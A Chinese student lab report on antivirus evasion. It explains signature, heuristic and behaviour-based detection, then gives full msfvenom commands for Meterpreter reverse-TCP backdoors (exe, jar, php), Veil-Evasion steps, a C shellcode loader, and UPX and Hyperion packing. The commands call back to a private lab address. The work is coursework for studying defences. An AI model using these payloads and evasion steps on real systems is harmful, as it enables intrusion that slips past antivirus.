2019-2020-2 网络对抗技术 20175333 曹雅坤 Exp3 免杀原理与实践

免杀原理及基础问题回答

一、免杀原理

一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
要做好免杀，就要清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础。

二、基础问题回答

1.杀软是如何检测出恶意代码的？

基于特征码的检测：一段特征码就是一段或多段数据，经过对许多恶意代码的分析，我们发现了该类恶意代码经常出现的一段或多段代码，而且是其他正常程序没有的，即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。
启发式恶意软件检测：就是根据些片面特征去推断。通常是因为缺乏精确判定依据。（非精确）
基于行为的恶意软件检测：可以理解为加入了行为监控的启发式。通过对恶意代码的观察研究，发现有一些行为是恶意代码共同的比较特殊的行为，杀软会监视程序的运行，如果发现了这些特殊行为，就会认为其是恶意软件。（非精确）

2.免杀是做什么？
使用一些技术手段对恶意软件做处理，让它不被杀毒软件所检测。同时，免杀也是渗透测试中需要使用到的技术。

3.免杀的基本方法有哪些？

改变特征码
- 只有EXE——加壳（压缩壳加密壳）
- 有shellcode(像Meterpreter）——利用encode进行编码
- 有源代码——用其他语言进行重写再编译
改变行为
- 通讯方式
  - 尽量使用反弹式连接
  - 使用隧道技
  - 加密通讯数据
- 操作模式
  - 基于内存操作
  - 减少对系统的修改
  - 加入混淆作用的正常功能代码
非常规方法
- 使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。
- 使用社工类攻击，诱骗目标关闭AV软件。
- 纯手工打造一个恶意软件

实验任务

任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

1. 正确使用msf编码器，生成exe文件

在实验二中使用msf生成了后门程序，我们可以使用VirusTotal或Virscan这两个网站对生成的后门程序进行扫描。
用VirusTotal扫描后结果如下：
改名过后Virscan网站的扫描结果如下(在使用Virscan网站时，如果文件名中有数字就会出现错误，改名重试)：

由此可见不加任何处理的后门程序能够被大多数杀软检测到，下面我们用msf编码器对后门程序进行一次到多次的编码，并进行检测。

一次编码使用命令：-e选择编码器，-b是payload中需要去除的字符，该命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.253.128 LPORT=5333 -f exe > II_backdoor.exe
将编码后的可执行文件上传到VirusTotal扫描后结果如下：
十次编码使用命令：-i设置迭代次数 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.253.128 LPORT=5333 -f exe > III_backdoor.exe
将编码十次后的可执行文件上传到VirusTotal扫描后结果如下：
可见多次编码对免杀没有太大的效果，原因有两点：
- shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中，杀软只要盯住这部分就可以了。
- msfvenom会以固定的模板生成exe，所有它生成的exe，如果使用默认参数或模板，也有一定的固定特征。所以一般来说AV厂商会针对其使用的模板来生成特征码，这样就一劳永逸地解决所有msfvenom生成的恶意代码了。那如果使用msfvenom免杀，就要使用原生的模板。

2. msfvenom生成jar文件

生成java后门程序使用命令：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=5333 x> cyk_backdoor_java.jar
生成文件如下：
扫描结果如下：

3. msfvenom生成php文件

生成PHP后门程序使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=5333 x> 20175333_backdoor.php
生成文件如下:
扫描结果如下：

4. 使用veil-evasion生成后门程序及检测
安装veil：已在实验前安装好，此中艰辛、竟不能言、唯有长叹。操作方法写在后面

安装完成界面：
用use evasion命令进入Evil-Evasion
输入命令use c/meterpreter/rev_tcp.py进入配置界面
设置反弹连接IP，命令为：set LHOST 192.168.253.128，注意此处的IP是KaliIP；
设置端口，命令为：set LPORT 5333
输入generate生成文件，接着输入你想要playload的名字：veil_c_5333
如上图所示，保存路径为/var/lib/veil/output/compiled/veil_c_5333.exe
检测结果：

5. 半手工注入Shellcode并执行

首先使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=5333 -f c用c语言生成一段shellcode;
创建一个文件cyk_veil.c，然后将unsigned char buf[]赋值到其中，代码如下：

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
此处省略
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

使用命令：i686-w64-mingw32-g++ cyk_veil.c -o cyk_veil.exe
编译这个.c文件为可执行文件;
检测结果：
当想要使用windows上执行该程序时，火绒查杀：

6.尝试加壳，企图蒙混过关

加壳的全称应该是可执行程序资源压缩，压缩后的程序可以直接运行。
加壳的另一种常用的方式是在二进制的程序中植入一段代码，在运行的时候优先取得程序的控制权，之后再把控制权交还给原始代码，这样做的目的是为了隐藏程序真正的OEP（入口点，防止被破解）。大多数病毒就是基于此原理。
加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析，以达到保护壳内原始程序以及软件不被外部程序破坏，保证原始程序正常运行。
这种技术也常用来保护软件版权，防止软件被破解。但对于病毒，加壳可以绕过一些杀毒软件的扫描，从而实现它作为病毒的一些入侵或破坏的一些特性。
MSF的编码器使用类似方法，对shellcode进行再编码。

使用压缩壳（UPX）
- upx cyk_veil.exe -o cyk_upx.exe给之前的cyk_veil加个壳
- 结果：
加密壳Hyperion
- 将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
- 进入目录/usr/share/windows-binaries/hyperion/中
- 输入命令wine hyperion.exe -v cyk_upx.exe cyk_upx_Hyperion.exe进行加壳：
- 查杀结果：

任务二：通过组合应用各种技术实现恶意代码免杀

压缩壳+加密壳+手工注入shellcode：

任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

不加入白名单无法运行，失败了。

三：实验心得体会
这次实验做的是免杀。做起来就明显感觉到，要做到免杀是非常难的，杀毒软件也在不断的进步，做一个杀一个做一个杀一个，心态有点难受。这次实验我觉得还是很难的，是参考学长的博客，和已经做完实验的同学的博客完成的，在过程中遇到的问题，就翻翻同学们的博客，看看能不能解决我出现的问题，前车之鉴后车之师，veil安装我花了一下午的时间，从中午做到晚上，如果没有同学的博客，我大概要做一天

四：实验问题
veil的安装：

step1：先安装veil
step2：如果强制安装无效的话，使用命令cd /usr/share/veil/config/进入文件夹
step3：使用命令vim setup.sh编辑文件，第260行把github仓库改成码云的仓库，https://gitee.com/spears/VeilDependencies.git（不换的话访问github非常非常慢，一般会直接报错）
step4:命令行输入veil，所有安装默认
step5：看到它开始下载东西了，你就可以放心了

谢谢sxx同学的大力帮助，没有他就没有今天的这份博客